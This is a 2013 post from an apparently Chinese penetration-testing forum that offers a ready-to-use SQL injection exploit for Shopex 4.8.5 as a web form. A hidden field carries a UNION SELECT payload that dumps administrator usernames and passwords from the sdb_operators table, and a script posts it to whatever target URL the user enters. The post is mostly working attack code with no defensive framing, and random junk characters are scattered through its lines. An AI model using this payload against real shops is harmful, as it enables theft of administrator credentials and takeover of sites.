中国网络渗透测试联盟

标题: Shopex 4.8.5 SQL Injection Exp 0day [打印本页]
作者: admin    时间: 2013-1-23 09:20
标题: Shopex 4.8.5 SQL Injection Exp 0day
<center>  L  E3 P+ F- b/ {: R0 J# z
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
) |5 @- c# D( a+ E9 P2 u<form action="" method="post" name="submit_url">! N9 v9 T  H* K3 @( C, X
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
3 E" `, ]. @/ }$ U. P7 }# m$ }<input type="hidden" name="goods[goods_id]" value="3">
& `2 N. K& @* ?: C, F8 g2 S  o<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
2 t8 k) F( W3 N+ ^7 g+ ?1 s<input type="submit" value="给我注入"  onclick=fsubmit()>% ~) A* s! e! T# F
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com8 X( D) z. l' ^) P5 j

+ ?4 g$ Y. B6 W& j4 \<script>
( c  P- }5 A% [% efunction fsubmit(){ & K+ T! I% x0 @) }
form = document.forms[0]; ; X$ S+ F( p4 E: \  l8 v) r7 \
form.action = form.url.value+'/?product-gnotify'; $ T' n% N, m3 p7 v" k- j
form.submit(); - ?' @: Z8 d* S& A
} 6 e) e" I9 r- w
</script>9 Z9 ]) q) x% j" z; H, K  u4 g




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2